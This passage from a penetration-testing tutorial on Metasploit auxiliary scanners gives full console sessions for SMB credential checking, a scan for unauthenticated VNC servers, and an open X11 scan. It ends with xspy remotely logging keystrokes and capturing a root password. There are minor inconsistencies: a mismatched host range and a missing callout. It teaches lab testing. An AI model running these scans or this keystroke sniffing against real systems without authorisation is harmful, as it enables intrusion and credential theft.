Although many commercial vulnerability scanners are available on the market, you are not limited to them. When you want to run a scan for a specific vulnerability across a network, Metasploit’s many auxiliary modules can help you accomplish such tasks.
The following Metasploit modules are just a few examples of the many useful auxiliary scanning modules included in the Framework. Take advantage of your lab to probe and explore as many of them as you can.
To check the validity of a username and password combination, use the SMB Login Check Scanner to connect to a range of hosts. As you might expect, this scan is loud and noticeable, and each login attempt will show up in the event logs of every Windows box it encounters.
After selecting the smb_login module with use, you can run show_options to see the settings listed under the Required column. Metasploit allows you to specify a username and password combination, a username and password list, or a combination of either. In the next example, RHOSTS is set to a small range of IP addresses and a username and password are configured for Metasploit to try against all addresses.
msf >use auxiliary/scanner/smb/smb_loginmsf auxiliary(smb_login) >show optionsModule options: Name Current Setting Required Description ---- --------------- -------- ----------- PASS_FILE no File containing passwords, one per line RHOSTS yes The target address range or CIDR identifier RPORT 445 yes Set the SMB service port SMBDomain WORKGROUP no SMB Domain SMBPass password no SMB Password SMBUser Administrator no SMB Username THREADS 50 yes The number of concurrent threads USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_FILE no File containing usernames, one per line msf auxiliary(smb_login) >set RHOSTS 192.168.1.150-155RHOSTS => 192.168.1.170-192.168.1.175 msf auxiliary(smb_login) >set SMBUser AdministratorSMBUser => Administrator msf auxiliary(smb_login) >set SMBPass s3cr3tSMBPass => s3cr3t msf auxiliary(smb_login) >run[*] Starting host 192.168.1.154 [*] Starting host 192.168.1.150 [*] Starting host 192.168.1.152 [*] Starting host 192.168.1.151 [*] Starting host 192.168.1.153 [*] Starting host 192.168.1.155[+] 192.168.1.155 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t' [*] Scanned 4 of 6 hosts (066% complete) [*] Scanned 5 of 6 hosts (083% complete) [*] Scanned 6 of 6 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(smb_login) >
You can see a successful login with user Administrator and a password of s3cr3t at . Because workstations are all cloned from one image and deployed through the enterprise in many corporate environments, the administrator password may well be the same on all of them, granting you access to every workstation on the network.
Virtual network computing (VNC) provides graphical access to remote systems in a way that’s similar to Microsoft’s Remote Desktop. VNC installations are common throughout corporations, because they provide a GUI-based view of server and workstation desktops. VNC is frequently installed to meet a temporary need and then completely forgotten and left unpatched, creating a major potential vulnerability. Metasploit’s built-in VNC Authentication None scanner searches a range of IP addresses for VNC servers that do not have a password configured (that support “None” authentication, meaning a blank password). Usually, this scan will turn up nothing of value, but a good penetration tester leaves no stone unturned when looking for ways access a target system.
Note
Recent VNC servers do not allow blank passwords. To set one up in your lab for testing, use older VNC servers such as RealVNC 4.1.1.
The VNC scanner, like most Metasploit auxiliary modules, is easy to configure and run. The only required configuration for vnc_none_auth is to supply it with an IP or a range of IPs to scan. Simply select the module, define your RHOSTS and THREADS, if desired, and run it, as shown next:
msf >use auxiliary/scanner/vnc/vnc_none_authmsf auxiliary(vnc_none_auth) >show optionsModule options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 5900 yes The target port THREADS 1 yes The number of concurrent threads msf auxiliary(vnc_none_auth) >set RHOSTS 192.168.1.155RHOSTS => 192.168.1.155 msf auxiliary(vnc_none_auth) >run[*] 192.168.1.155:5900, VNC server protocol version : RFB 003.008 [*] 192.168.1.155:5900, VNC server security types supported : None
If you get lucky and Metasploit finds a VNC server with no authentication , you can use Back|Track’s vncviewer to connect to the target machine without a password, as shown in Figure 4-18.
If you think a VNC scan is likely to be a waste of time and that you’ll never find systems with open VNC servers enabled, think again. During a large penetration test, which included thousands of systems, one of the authors noticed that one of those systems had an open VNC server.
While the author was in the system documenting his finding, he noticed activity on the system. This was overnight on a system that was unlikely to have an authorized user on it. While not always considered a best practice, the author pretended to be another unauthorized intruder and engaged the intruder in conversation via Notepad. The intruder was not very bright and told the author that he was scanning large blocks of systems for open VNC servers. Here is a segment of the conversation:
Author: You in the us? or out of country? I know some people in denmark.
Attacker: I’m from Norway actually, hehe, I have relatives in Denmark.
Author: You hang in any boards? like I used to like some but they have been going away
Attacker: I mostly hang in some programming boards, but not much else. Have you been into hacking for a long time or what? What’s your age btw? I’m 22.
Author: I have been on this for like fun for around a year or so. Still in school. 16. Just something to do.
Attacker: Haven’t been there. I too mostly do this for fun, just trying to see what I can do, test my skills. I wrote the “VNC finder” myself btw, I have found a lot of servers, but this is the only one where I could actually have some fun
Author: Wow. What did you write it in? Can I dl it? Do you have a handle?
Attacker: It’s written in a language called PureBasic, but it’s kinda not ready for release yet, it’s only for my own use. But maybe I can share it anyway, I could upload the code somewhere and let you compile it. That is if you can find some PureBasic compiler on some warez site :P
Author: Thats cool. you can put it in that pastebin site from irc. That lets you anon post I have not done purebasic before. just python and perl
Attacker: Let me see, I'll look for that pastebin site and upload it, just give me some minutes, I’ll be around.
The attacker then gave the author a link to a pastebin page with the full source for the custom VNC scanner he was using.
Metasploit’s built-in open_x11 scanner is similar to the vnc_auth scanner, in that it scours a range of hosts for X11 servers that allow users to connect with-out authentication. Although X11 servers aren’t widely used today, lots of archaic boxes out there are still running old, unpatched, and forgotten operating systems. As you’ve seen in the preceding two examples, legacy systems are often the most vulnerable systems on a network.
To run the open_x11 scanner, simply configure as you would most other auxiliary modules by setting the RHOSTS and, optionally, the THREADS values. A session is shown next. Notice at IP address 192.168.1.23 that the scanner has found an open X server. This is a serious vulnerability because it allows an attacker to gain unauthenticated access to the system: The X system handles the GUI including the mouse and keyboard.
msf >use auxiliary/scanner/x11/open_x11msf auxiliary(open_x11) >show optionsModule options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 6000 yes The target port THREADS 1 yes The number of concurrent threads msf auxiliary(open_x11) >set RHOSTS 192.168.1.0/24RHOSTS => 192.168.1.0/24 msf auxiliary(open_x11) >set THREADS 50THREADS => 50 msf auxiliary(open_x11) >run[*] Trying 192.168.1.1 [*] Trying 192.168.1.0 [*] Trying 192.168.1.2... [*] Trying 192.168.1.29 [*] Trying 192.168.1.30 [*] Open X Server @ 192.168.1.23 (The XFree86 Project, Inc) [*] Trying 192.168.1.31 [*] Trying 192.168.1.32. . . SNIP . . .[*] Trying 192.168.1.253 [*] Trying 192.168.1.254 [*] Trying 192.168.1.255 [*] Auxiliary module execution completed
To see what an attacker could do with a vulnerability like this, start keystroke logging using Back|Track’s xspy tool, like so:
root@bt:/#cd /pentest/sniffers/xspy/root@bt:/pentest/sniffers/xspy#./xspy -display 192.168.1.23:0 -delay 100ssh root@192.168.1.11(+BackSpace)37 sup3rs3cr3tp4s5w0rd ifconfig exit
The xspy tool remotely sniffs the X server’s keyboard session and has captured a user running SSH to log in as root on a remote system. Vulnerabilities such as this can be rare, but when you find them they are extremely valuable.